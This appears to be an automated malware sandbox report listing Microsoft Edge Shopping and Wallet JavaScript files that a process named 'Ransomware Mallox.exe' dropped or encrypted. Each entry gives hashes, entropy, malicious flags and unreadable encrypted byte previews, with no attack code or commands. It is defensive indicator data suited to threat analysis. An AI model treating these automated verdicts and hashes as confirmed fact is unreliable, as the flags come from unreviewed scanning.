                    SSDEEP:24576:DHK8Kdy1e3Bm0ySyKR7tLLgwsrYiAOCUlYndGAG63stQgPAAq2D0zlTP56onGlWy:DL/8B7VyKRpLkwsBNlYB0QgylTP8tXz
                    MD5:CC9265289C0BB8A2C78DA69F449D31D5
                    SHA1:EDCFC3E560B30F24F84A477FCA4071F76CEDE98F
                    SHA-256:4992B0DBFBBC92E533F2B0A371B082B99A666CCA0B6525AFFFD756399BABB641
                    SHA-512:C53138AC00205E7BB9BB48639A111BD536A4687F1A022A108B923C4FA9600F4E1F60B4953F0BC7B338CC9770314A7F0274BD48D2C018C47E99F8EF37B6C52459
                    Malicious:true
                    Preview:...~+......X...G.j..(.}~k.<...x.....qu....H.F!n..$./..V.y.......].b..=#b.....5a#ZP.........m,.D\y.e.#..A.:dF.../.r.7...=...Qm..T..;..}..:..Lh.....W<x..C}.aJ4...>..X@.8..VE..Q.boN..A2`o.'...l.s....G.....s..lF..rg............y.........`.1-.@.Q..I%.7..n.:.N..._......cC.Gh..^R"9.'.5K...(.......+.|...d.2.Y...g71.ty....Er.>=8.y^.u.....2..l._.....b.....$O.s!......s<...N...Kz1.4.U-.........(d.(}..|.+..<..E..O?.L..p_5...""....fd@...%...i....`.....*&..).w.o.p.f...T...C....F?.9....o.........er2.8J.<....g..P...G...p....V.%j@.....d.e.s`..6.......4.w.E.#.1vO...q/..<........#.CRu....N4.7c....yQ.iB..'.gK...m.....'._x...n.....;6\ a..20.\J....)..%J..\.g....1k.....+..p'e....C.....J-.I{".{Ff.#.x....d.0.a.../G.v..s:.o&xSH..Y.6...u....d.p.~.....0 |..L.`.K?.{L....b..P..v6...zp..5.A=.:....=.d......7..bB{zk.d.)7.bt..?..V. .k!t..{..)x./........K..j....V.nXM.,.p...q.}..8hw..eB.....:).'.Q............C..8.?N}.7.J.%..#....3W.{....... ..KS..{p.?G.9.Z|Ob.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):79895
                    Entropy (8bit):7.997757707590117
                    Encrypted:true
                    SSDEEP:1536:ds0vNdmeuIVoJwCWx/TpgenF47uAyiqYueW9GKr08FUf24rRLMDM78:eUAtIZ7pgenF47u/iBu+CLAaMg
                    MD5:BB087A5929AA22D39BC6D0E559528A3F
                    SHA1:E882B0187A54103C961DCF263A247AA54E0AF772
                    SHA-256:ED7A7738F32477D816D708160475BE77FDF720AB5C001AF0A129367F90B60E18
                    SHA-512:9DD4B0B2380349E9C654D094610CA8F574DDE29F3A54F54371778A9C412E9345DE9265F5FFC889AE5E80C04650B3EF14A410F9BFB8613C469029F0906F9342FB
                    Malicious:true
                    Preview:`[A.....Q.s.....p.K8....&..N.......).....L....ZlY..[.........A..K.U...;.z..g+@.8..X..K.... e_..no..0wx=.FBF..n.b...........-1!:c..JqnEI...qaV...(..."..*L;.....@..,N..].'.S.....'..-...E..J......./..g.A..m.........Z...AR...T..@M..b..lW.W..u..Z...... .c"..s.qm..u&.BB#.F...N6.N...p.$5....Fj.m.~K..f#.......%Ol'..q...QP.Z.. 56.. Fy...VR.B..X.vz.e..~..1....?k..H...K...g.p...Fr.@^n.._.+,X.I....@....>..P#=).E....2.".u../.p..h.R....G.I.....-...j....E...._w...tH..s.(.b\.OaeP'..}.s...e.y.R.......H..@.Y.w.y..B.I.2.P..)z..W.........eF.}.V.P.I7hU.$...z..{.{.8......m.{..#.Fa....'..#.4..........V...H.PS.+..M.Z.-`...$..x..w.F.2-.2c[2.u....`E4R^uw.4.....aE`.hv.G....D.G.X..j.38....?.X..,.k.B.Z;:M.=#.C,.u9-.JCeP.ZB..rt....2%..M.Z._...qt.j.........oe..y.-o.A...2m...RG..$A.<|....cg...........T...^y....FG..`.k...l.........U..d.f^+W.);.Tb&t1M\*......-#."..]`.d..?...FrR.{.\4.}E....:....J31..O.<V.....>....lF2.s..5/.....>........L.J>.+p..#;..............>OO.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):988423
                    Entropy (8bit):7.9998387802562245
                    Encrypted:true
                    SSDEEP:24576:p8iJn+MGRL5II3QKX8anjqP2DKdJRSwXsPhLn/ea2Yco1/Y/5:xoMGJlgydnWTJRSr/sPEq5
                    MD5:8998385ABA3C9417BBC0622789656B36
                    SHA1:7414559D1F8A9696276C2E9787029A969FE6AF4A
                    SHA-256:C3D77D91195E88357F7E236340E2677856FED0E81110BF150CA8826E5836E3D2
                    SHA-512:3BD077B9DCFC893D3DF553221321E8F317C41C849F918808D99CEBEF257CE416EC54DE0041A244EF43E6774D10328CFF88EF11374EEF39E60A6C5684BAF0FEA4
                    Malicious:true
                    Preview:..@Qp..o.x,].&.g;..y.E)i,..6Bqd.4.O...3.QE...Nx..-F...$...*......J..Zu.$DJ>.hDC}Et...[..\*..=...h...+.@.d=..D.."...OU.H\._.....j.j...N.!D>k....M..M.k,X......@...,..A~=|.6..;...1.).\.Z.a-.to...gT*RG.@p:.........-v....Tiv}a..*l...:}@.].co.....4Be.Qg...fPxC.dgS.....+k...<I..G..,..zb..R+.b..o..9...Fn.I2..B......d....?D..Ff..........Z$.4...vm.........R.e...?....9G;.3*4........].!....e ...6...12....sQ...{o.Cq+.[QW.pC..-.z..O..V.).P.....G..C........A.?/..:..:QO)G..rt....u......E..j.V ....Tfa.#.e.~f..........|...{.75....j.3).p.%.t<W.w...@...g.N..K..9.uz.g....C...6......A2..k.<{.V..8..(3..]3.-.....`..0.!.=-c...M}hA..L..Y...;.w.P......G.`..*..:N.#T....FT...Y.d.R..[......>.FF"A........-..G..Q.......4.3[.....&../...7.}]..D"...`...4...8,..sc3......_z......&m...q.0r...u7YO@~.1......x...|>..LW..4.o-....y...+NO7.......(7.a....B ../0.Op.fL$U?M...p..c..C..fwm2...-.[X7r<G3].......l..t.$....d'../yZ.-@.y.....fA......?l.9v4.'......n...>.So;9..z...G

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):5653377
                    Entropy (8bit):7.999964921070115
                    Encrypted:true
                    SSDEEP:98304:joN6KeFDnotgSTIFjMWJPc1BhruWbebb0+og96dVzoGzocIx2HYv:cNPeFzotgSTIBMW+1xbebbtJ96dVznkB
                    MD5:0F182756FFA16AB2C7BD770280DF020B
                    SHA1:335612183E5D4234F7971A5B296CEDABAEF9A3AA
                    SHA-256:53D29D8DCC3D2E76FF6308AD9B0DBED75C2E4D96FEB6BA6CBDE67D07A0B3872F
                    SHA-512:00927D979C95D7BE84D5939FB8A3A59CB2B5A6F08F9F34A612D4372A956FB4B82FD9469AF68939DA2AE733F54159FB634D50BC26B984A8FDC97BA7D0A2E52212
                    Malicious:true
                    Preview:a..H,/5...........*N.XS.==o.~....:Ru...<.....UQ...5...I.........6...!..4. ..|..m.%!?......+.IZ%s.&Zx[..k@k....Z..?..5-......V".....@->R1.0.c,..z.B..,..cg$$4N. f.V..]..#.i.+z..:.o*.X5L.M.W[r[.<.f....|.....y..,+[4..m.KHN...r....`}.@.........=....,!.l...>=.|.0..E..&$.n....i.....,<..*.d.5..0.....h..z"U..6...v...vw.}RT2J.D.m>1.G....hz.e.C~.6....e7........V[+U!81..YL...=uF:..JG..a..]..c..o@.;.P%....mH.|...H......a.!...!$.,....r6.E^...?.q...~..%........;....YI2..0...g~srdB.P..*L......:\..<gvZ}ed..~......N...E.yx..5......c.F0$..1.....L2W........f./..1.1..r.....!...8>p..w9X...y.Y..-^...{...boK"..>...x.......7.........1...G.D.}...5.S.....R..n...kBC.....~6Wj7.B.H.....y...k.........?...WE........Sr9..x........}<......'...I..g.._...S..k...H}.=...A..~.._.........(#...s[.g...B.N.....#..4...:..|_.\.:..`.....u...3..........c.T;I.*..".<..._7A....f.RV...w._.%.DW.^....,7. ..ID..6..$..['...$...T.....,.7V...>....`MA+.....m.@.`f=n..,.QyE...6..pB.........W..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping_iframe_driver.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12044
                    Entropy (8bit):7.9851039860582755
                    Encrypted:false
                    SSDEEP:192:tB0op8aIYWLaSulTJDIcphNziPUwd+fntCLS8Dig2bSyMsAfjv80rl5toOE4gqZ7:teo61YtBhNzSUwdWkLDmxYbUu5BE+DdT
                    MD5:94C004750A73F4E8F60AF46CC9EC9B92
                    SHA1:457DC3DE8DB760F0210D25A3988B8C84FF26C373
                    SHA-256:6DA24E332B38A9BE0F422B69A4C8B043DD8A90FD81C92477CA0D7489DFBC7E66
                    SHA-512:EDF2EB911592B5BE5B7A3B675A6E5501467DDCFD16A8FE3C31DE8806A55D82CB965A8C4001206C165DCDBD80CFABFD6D5650AF0E16DB983F808B547319772229
                    Malicious:false
                    Preview:@.u.nz.qW.:.~..............4..PR.E..cM.:..=j...+..&.V.z....@..L..;...V'.F..'r..4U4...S......2G=.g...|....+..F.....m..?...Q{..*......W........D...sX....^.f...y.v....'.6z%.._.2`....)4...(.6P54.<....T../6..9CV..N...)....\...E/.j!(8......Q1-<..F.U.t.....w..z......am...c.O ....jL.g.......MKy;8H...".h......O.W...`......].q......q:.@.^^....../M...`..x./vEa2"...F.......,...)..i.O.}f..|..T.B...r'....q...C."..|M v2.!.o:..+..w.OQ3K....!..@.."..o..J(....=H-.l53%!..\.C@.e !...@.c...#m.q../ ...OX8..\X..n\...?..,5...8.=X.I.>...'...t.H......^...m..$%X.]..=...l.+..q(..e},%......?."SH.. .....d_.^...._.f....."PA.."T........Oe....e....D.f... .s...a...#..2]....u......he...?.k&.cO.....j.....A..X^...,d;......YK....H..].M8......Z.....6S9................T.z."w..4.b..w.}.....&.,..a.+......3C..$....c..[.dH[..P.....5.>..V...8H.P..1....7et...k!K3N.w|.s..'P....$i....bL.=.q.F..rK...sH^pc.k..R.<;0L.......S._..0j^.........l...A......7.n....0..T.....V|J.\..u.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):357883
                    Entropy (8bit):7.999507681282001
                    Encrypted:true
                    SSDEEP:6144:l7/rFR8W6x5aY3SbuPiEFQYJ8fbCNHlT2BcJHRXCn6AQ3RCv8eAYVhpq:9N6/d3iOFPJsiT2B4xXCn6j3RuHhA
                    MD5:F15270A02F932F10955810D4CAB0DBC9
                    SHA1:315CC3FE9DF2B2611869C75E64A01C86FDAABF5C
                    SHA-256:049E016648899355BD18F0125E77B70D127CFBCD0A3983118A4917D1C05A80E7
                    SHA-512:65FC182AA2A83E27D42B2C931A051DECD94DE5313550FDF07EE6B8F98F185073EDE0DEE6F71C07828055CC25CF5CEB1E495A05A4E0C0B99F0052DD1005F8F048
                    Malicious:true
                    Preview:........^....L!N.'k.__..j,r+.TbJWY..".@.^kkGc.._....t..7..P...w._...jm..q.P{h..Y..oA....Z`.V'..."r..+eq;.m!..JBl......b.....^.+."jU_.......hF.cn.i....n.......h.t... k..q....=.....A.?"....cv.B.A..Hs.u.l....~..?4..%f..~:L`........=........&@9.y...Jr.o/:J.....\9P..]....\gd0..b_"e....C....G.B.....X..k.H.+ve.[7..s..".F0_H?.B..iN,K..Rc}k<..........Y.(....GqO...H.D[.nP..Z...g../..aHd+d.Q.1.V..mfA.6*.F....-....|i.F.........M. ..X...2!..=.+.k...H..R/..7.U.u.....7Nz*..<..^..b.....W..Q..B.rm~T.....O......n.....^..O.:..u.w...R.:.4..>.<e..$........G^[>m...|Ft.X2t.._.(.x.3....gx.6..*.....g.(..;D.S$(V..g......l.P.].laB....o..n>.....r..Q..*..-...H@....o1?Bd.Q.]..N.+........H...8.2..*y#`...d.../...jsX..#@3?.Ae.G.S.\....+..G...n......Z..06..R...&.z......AB..k)#..WJd.E.q,....1.....R......."..h..W\.*R.`qx|..@V_w.G.."..[...>.A*..S..n.%;%..9..j.F.+...e.ST[...mb...#...C.f,8]U~j.x`0..TD..Y...!...1.R..q%.-N.a.t.0.,f.v.n....i.E.qnb..=z.0.......~...;]._...l.....C9$lW.Kn...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):363023
                    Entropy (8bit):7.999607449284003
                    Encrypted:true
                    SSDEEP:6144:WiOFSfM4Dvn9dCa+00o3ysuf6086yow7HcDFxcnAbIevlPHuWBIw2fOOzZx7:/fM89dCY08mwrcDfbIivuXrOOzZx7
                    MD5:7CAE361A60064F3635265DCFF38788DA
                    SHA1:049DD80953EDEE600F8A86BE3F63DA75A9CA674B
                    SHA-256:1E111676FEE8BBE2DC1C822F9B9E5970E0E6601ED80CA0F7C99A28F6A92A43A4
                    SHA-512:18157C838B130BF1660E565ABA6F105B8DFA419CABAC583DE9DC1EC870CBA7E9A85A6EB0E643FA2BA857CF26D9ECFBF31A21750B753CC02595C7E30B92FB890D
                    Malicious:true
                    Preview:.7.@.I._.....s..y..}..2my.N.3s..J..W.pd........4...k.,U;.[..n..u=.|9....[.^.&.fA.W....K0U.....e..7{...J.`.........T$,.Z....rhi...6=.,_.q...."........~.]/...z.qc.2l=..:T/..h.S..+...0..={.*..H.9..S.c}.S....b`...*Q..[w. ...U..MrA.:.!U!.?.:H..L..o."-I...5..o...E.....Z.w<!]..{p.=.%..d].=....... (>..`..}z.HE.j...v..S6.jW#..G....,.m0...0...z.{.P0.x.Eu.Y!s..q.i.KlR<gZ....!.y.e...N..As..zQy<..<^...Iw....O............b.g.....44.,...;*...[.%.....u.O.fq(.d?.s_.^*m..s.k.L:C.."...?u5..*,..[...<V....D.....u;*;.k).-.l.{.y..:U..2q.P..D"d.7..*.....I.(......m.#.(=5(...VT.Je...3.......G}i.p.....=...g..22...1"...r.\J.{..V.e.n@.`.z.....[.0..?.T...7.4CE....G....~..Z..d{.:Kl"T...P..l..Q...5.'+.%-`..K...`.a...$..... .. .!c...?.y.+..:....XY..3W... +.....9.~. )v...^v..\..% K....U..N..5..yU..06.w7.^c+..\@}.q...CV5&.U.r....(.R.[B.x"..A......GAr.|...d..%....Y"".a.|...j{E |.z..a....1...B..../.D.o..s..#.z...o.I"...pP..N$[......n....a..t...U."\b..&8.e..G.O.....|a..........

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):493214
                    Entropy (8bit):7.999614093170356
                    Encrypted:true
                    SSDEEP:12288:DO+uUYzbzKUhqHNbB7XHiotRv0tJwCPUtzwJP9:DmBzbzKUYHCotGLwCT9
                    MD5:2636521EAC00C66FB2BAB1ADDC13E01D
                    SHA1:D3BE42B4D606C3E9B30CDEFF9F665B2DF661A5AE
                    SHA-256:45309114DF8DDAADD06E858BFA6CA6E030F65A926AF267757258AC9EAE74A2EC
                    SHA-512:876F7553D74E7473C9F6A5C712C12AA60C84DA9B0F9209B7E55FA379B678430519E214FE17725E15474C956D9A84ECE845B8CECD0DE2509332024121351CE0C4
                    Malicious:true
                    Preview:...'o..E.BP..?......B&lR9.JQ.mW.>....$..]?A.9....`^7..I..".n..F,yH.......'..B...+..../.b$.w.t...!mZ..Z.p@...z....p}l..?.m..#.%.=..-.3a.:.....#/..+.b.../....r.m....9..-]..+.q..1.v9"J{G..T._#yd.K|..`...HS...['...{.n,.Y.W!Y..X.....-8....z.....u....F.~gY.i.....:.. B.O..w`.".J_.(.#RS.0\E)..U3.G.*S...|mwv..A.2%.Y8%;.p.p..PF^.....Z%jm..d.Ad..~.{..\.>g.NyH...1.p;....}.....W...k..,p......5>....G.:...5i.[..'..:..<..f.....r......Z]..>...a@S.U.|.Yc.&.....P...a@........b./.Oz6..z..c%.@.b....T&...A...q\.,....ID(........iyj.X7&.A..'.......:.S........./WQ...1.c.@.0..bc.zz.9..=M.%..'.J.y8...|........btL...-.i1....../...u?.0..@3V)....w.S..3.(gG....LBZ.'....X.U-..a..x.){.....+,"..9tzz.'..:......l..[..G.....C.M@..2....23.Q.I.....i...-6.....y...d..\nq...)...5..7......K.q...w4U.01S.zKR.O....T.r...(.(4..S<......avW}..}.!.n..'&..EB..z.).j4M.......H....y...O..........2~.z.....}..........N.bj.;z'A.._}....'.r.9.N.2..z...B.X.......H.Gm......<.3(....%>.^m...DQ.F.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):329798
                    Entropy (8bit):7.999464777269974
                    Encrypted:true
                    SSDEEP:6144:9wxBUJ/foCwXrWSMJ3gWHSL5RWxVW02eeKmNc7i64G0v:+bW/fniImWHSL5RG8eeKmNc+HD
                    MD5:1762CEFCD6A8F41FD673FCCAA5226658
                    SHA1:ED4ADD22B8E55FA07591532D4297967992CC0454
                    SHA-256:94C35B11B28C6DEA8D458E6B4B055D5BE0C538645E4EC57366AEB098FF7A3432
                    SHA-512:2FA0DC806DC96D1CF5F1330F7A8B790D9EA6C9BBCCDF73C7122ED426E1D5AD2A483FE47B3ABBC0470E556FD7189E2CD1716394A3FEFBF178457F2F36A7F5122B
                    Malicious:true
                    Preview:H..~.|..eB..5..Z.hk.O.+. ..F.16;8;....y....L[.0,E./...y...P'-.s....^.pI.Mg/........y.7.2.@.3/.l!kk...W...o.....!..S.......'Kr.B..Fw..fF...q.....+....../[.b.*...........LVx.... ...[...L..e.(.e....tm.i.i..."2o....[.!....9....7..lE0"w.E..2..J/.....m...kk...C..wI/....@u..h."=.....se..T.....X...Rm{......0 ..p.../...5......b......z.p.....S#.5>........Z@..MQ0U(....Z.......3...ZL..om....c.>.}...st.<..2....8g...7...{[....s.4.w..1H..K.h.^.......x.i........{OK.q.K....T..fj..u."......t,...M..t.... .k.(....%j.*a.4e.1]..S ..W<......,.).h.>..I...B..|.......5...*>Ea._...m.._......3.8..&v.........4.j.I..x.y..i....1..d....A....u@.bI....!..O.b....x.g.....e.FA..S.7.3..8YqL}.....p..q....................G......2..h.'...../..,..e?J........2.Ps....C..G[......>.yae....~9..sg....F..+k.>...K.M.*.}.!.....!..4@iy~.L.kOn..2w.Q..+..8.V_..J|r...d@..q;....=]../..,q......[...An\...ui..k..B.^..g..# ..H..R].f.m.T......%CgsP.... .....:.Bh...d...A..r.^.?.%.......t.KIn..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):552357
                    Entropy (8bit):7.999665531052061
                    Encrypted:true
                    SSDEEP:12288:uGknAY4g6Kfukk3DckWBlsYkMMsLKJ+wNIIB7hL/zOup3:uDugLa3wXBiYkMpASo/zOup3
                    MD5:BA21A5290004632D82997E25628339D9
                    SHA1:A1632B82AA109162BB40B432C628585F4BD19AED
                    SHA-256:13385B5BC6AD40B9096CCCBEB286E04CDD759856331DDC5733CDF26A0E73EADC
                    SHA-512:286B0D00E150214EB9131005B1A4AE85349B1BF87F6CF1A82DDFB41B04E66417FE4354D9CEB52C3EB295C4DDFB76147BB3617A63C3DE657D4951EB52426A1F35
                    Malicious:true
                    Preview:...L.R.FoZ4L.*..._.....U.?W..I.r.8.mf......`P...`h..".K ....../...xT.wM)qh..7.w......7.lM$..5......=>..S&B..CG>0y.oR..i...<.%....^.h5|...yW.]6w..15w.0.G.dIz..,..6.0....]2..&.b.DF\.:.........hN.....rr#?.dWB.$..)...._..z.B.."*.ww...7....i..2._.._.V...2."..<.L3.k..PL...D&..4=~S.....dA..x..R.c0 YMk..,=.6"....M..6.%..N.u.`E.........9,.=SQY..T(.....O..*....D!g..p.R.DR...{v....J.........#..}c[.g...y.<.6..'^o...a.w..}......TK.>.jc?....p.u.t...7.;..T.]..d...l...'....%.t.*%.Z.D.9.]......<.l7 .re..+....f..d~.\A....."...Ox.$p'Kq......O.(.S.b...7OZp..F5.*:....$....3.8...@.3...#._kd27._+N.|.....$.G?.......5..........0.a.%2....<tI...Y...2..`....W.}.........K....p?..\..?........5.{.-.ky..4/.V..'.%.....N`@._...j^.AX~..'.Ck.m..A...i....#........+....6a=&...{.....8..=}..,T.*\..."x...b*O...J..P.....S..bU.`._.'S.E..j.."..m+C2_..... ..(.M..{......?A...."......q1...`h.....d&.]AQF#...4.r..Y.t...{./z...]($p@...XR.g[-.Yw.{.............f.@;..:...HT.9.... ..!/.a..T...U0.M..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\load-ec-i18n.bundle.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):16272
                    Entropy (8bit):7.989082227452141
                    Encrypted:false
                    SSDEEP:384:NXAn1IAX6yf9NcwdGkJJILA5nOUvzsmQCO8kLWZbt:hAn1IAKyVOMxJJsA5OGXQCXH
                    MD5:8E49BF2987AECA44EB09B42E0162F1E7
                    SHA1:A253E31E2A79D3BA64B4869F20B7E28D6AE5A263
                    SHA-256:E06F0A506D6E9CD4AEB26D02BC0751BC9230E68783351764DFAA972AE41DFAD5
                    SHA-512:B824FE5681BA697E6FC456BFA298EE72B4EAEA74F1161DED7A2E9606C9F5EABB6DF4026520404DD93BB50829B7D2F4BB25E0725F8D4D32734D5ED6760D1F3D3C
                    Malicious:false
                    Preview:...*.y........5t}'O.n..0.w.My.&..`.>..z2.8...)...4..x.-.3...r..C...j8..=..="E(.}..(zq....Y|..q.$(.U....{.).Q*..Jcq....0.a..4..U....vK.Cv..M.h.T..mm.%~7.../nS...*d...._.OBI.../.D/........jM..E...,{.=..r..O...q...5.!?....jtGk#.Y.P.5.T..._+.)..v.s.....d.F.L.>..]!g8Z::.$..Gy#]<;..g.H.P3..b.c..P.b.0.Jg.=q8.=.....W..,."%.z._.[).N^...m...4^l.}...x]M...V...V{V..U).=...M;..P.M..!.......[2E.)."S......`.b..{"..Te...E...{.....10..#.{.]j:..#.@#4pv.b.j.c0..&.-O....H.....'..V..~..V..+..Dc._$...{..rl...xp.T.9....c.\!Mc...../..t.`',c.C.=..........-...Z..1.....`_...e.0..S...W...Q.$.Y.^.(l.oJ.........\.....k~C.>.XU.[t...M?...!..Yi.V.l.|../......X..:...\..v.5o.,.|...,n#;.....v.t..g.J...]..y....B..~...F.i6T6.......NY..e.......z$.>..~.........H.F7}.K..H....?....{.^.....h,...I...].|G,.H......ih...4.eUDSg...Q..1>.9.s..?....^.~.U..cA.STD...7...v..."..r._a..X...(E...@G.C..^.3....K...m..=...b...VQA...&O)..i^.C.....QS.7O..91j....f:F.=0...;.3i..A.0&..o........c.S6$.@

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:PGP Secret Sub-key -
                    Category:dropped
                    Size (bytes):1394771
                    Entropy (8bit):7.999878735920271
                    Encrypted:true
                    SSDEEP:24576:ShxAGBUKraarPJkIaeJ9uYKX05KkUx8f2yIKnoG5uYsnyWf/av38:av2KBPis9u9oUm39Mygf
                    MD5:0B9748BF2CCA5F56EBC63EBAF6ED6029
                    SHA1:4DA8812D598681FFB42645136A3C8BC550C084DD
                    SHA-256:FAADD979613743A23A1CA670ACDA70C1E7125E901119B3CAA10A62E1536F113F
                    SHA-512:E9D806A7B48D42FE3B2CBBF61497F484965EC3F8E4A23BAB99E5AE8051AA789B4F5D7803F26177985F4C6928EDEF3B72AF3F9662AC1ABBC4D45230F28E0C8A41
                    Malicious:true
                    Preview:..*.../.......e.t...".A....g....K>E...ELRN...E.\A..2..j~...$......e..}.y\k|.=..iVV........Z.<...q.v......GY.2+...R..G..(%n....#.'.}O}.{.j.........NOa...n...@..s.6...y....=........J...m...eO""p.lM..g!......^.3.<{.a.......R..K.5~..2..H../.nE..YA..}...Fv..i.h...6.^.....;.....4Y{..."2.{.......(..DZ..U>..B....$k...O.(...SD...Q.&.}.&.Q....n.[J.;I."SS30..LV.&<.......?.#v.&...,kM.4..-/._.....1.SP....|.v....I.1%.......x.z..x...@w....Z.....Um.E{.d\.....U8.}bh).O..S.CE-..@C.u`..}..s{...p......8...\.......x....].0......K.f........~ch.]/...E.'.^...M.T..._E_~.2..D.e?..v.jKh.X.?:d..../...Uo...r?..v.:....f..L..@.....n.I.M(..?p._...q.....{!...n.K~1`.?..Ww ....L,Z........I.A...L...8...V.*. ....P..F..q.;.....k.P>n......X.>o...0.+.....z......U....\m..4.4.j......X.6.f\...[\8....;^;.7.m.(H......m[. .&.$.v.N..z..l..eo..n.N....D5.c....l([...M...BU..%....P...sA(J..e........=.....=..x...w....L.D.......{.;._.{...z..T.../...y%.e.`.Y.|ZB...1]Zv.Iq70Y@*..".4I.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):843001
                    Entropy (8bit):7.999780180315465
                    Encrypted:true
                    SSDEEP:12288:oXYMkoPkKoW1UeozV8O8FeJmJlbdFiOknNYv7G8+eCVY+UAIpfRSaWrIMw5MJBUb:obYWKzV8O6/enNAgLC+NSSXlPUb
                    MD5:BB332D22C53BDE9209F2FB3C2054F34E
                    SHA1:EF2519D2FBC3E58F0B0FEE26261B8D700A1B3593
                    SHA-256:C7C74C48641EE59505E5DB740D1228C19B8D9C6AD96CF601631929595F3D859B
                    SHA-512:87F1B789A346978E5F18AAA45FD068A72F432EF7B71B617AEFBFC66506917B7B822ED060F7935BA935C0A4F364171A8CDC39F555DD45B19A0F334D09FA28FA3A
                    Malicious:true
                    Preview:..y.h....l....`..a>.S.-..P.IG..V.....*f..@..|.S.a.N...i..5..}q.*...b.).9.?b..5.T..4..\.w..h.o....K....&.......+6."...1..KD..f.]...._.?........F..=b\E2S.mE/..Un.+.w+j.\v.y....u..#5...8.Kh.!...n...~4.;..".....>...e^.....B8w...S~.X..z...F.i......$.(.<..G....Hm...zc.............)....l.@)..W.z...:.h..$C...i.....C$...F..:z.(B<.ZeC._....R{`=...:.4...Q. tE.-..\.....&..Q..N.j.@.)..F................4...j......./rH.a .:...I....L%.c#...+)~&b&'.a.b.*..$.;=-G.S.?....a'T....We...M.l...r.{Z.r...y.f.:a+"..t.%..s..).F.{.QvT.....g n.:.Q.. 7.(.....\....a..;..~65.4TB..-.{.....5....@.d|..0...Q.N.g.M....U*......w..6.......Uu....'%.x.w...b.......8S..{N)...3...p6.........1..GM.......U...&.0@j..../..3.....EAo...N.....7HN..S.W..j.3...$\.V1.....w5Jh...)....|)X(<./...2..:.C......2..[x#...X....*Y.D.X..]...N...otR........`.....h}..O9..Lp7..|..h'...L?7.zL*.9.j.... ..m...3v[...u(i..;t.d.....v:E....3.....e.<<.B..E......p2^...p.JL|.;.c....lvJ.Z -...yf.@...|.y3t...T"..w...lg[!.X.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl_driver.js

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11650
                    Entropy (8bit):7.983205948758681
                    Encrypted:false
                    SSDEEP:192:bL5GeSiSYSn+vVv1x2KkfOP0AKd1d08EAWB+v8xh0yTtk9IPHeouRWQ91+6AEE1I:bLAeSPoVv1x2rMk/m5AWBPvPtk+vwRh3
                    MD5:BBE919348E87210B8130504F5B9E918C
                    SHA1:ADC103AF8B1E93A81DB23433D5ECE7D10FD32999
                    SHA-256:DAF751E3B8ABF34C80A97A4203051E5BB5775E5923CB255487A19DE0758D6F1D
                    SHA-512:3453E97C8814145C3F5447D9D74E93CCAD8B91665990D9366FF252748AFF0881608B991B16FD447BF4AE2DCF13219121C02914F88702387CD070DE87325195B2
                    Malicious:false
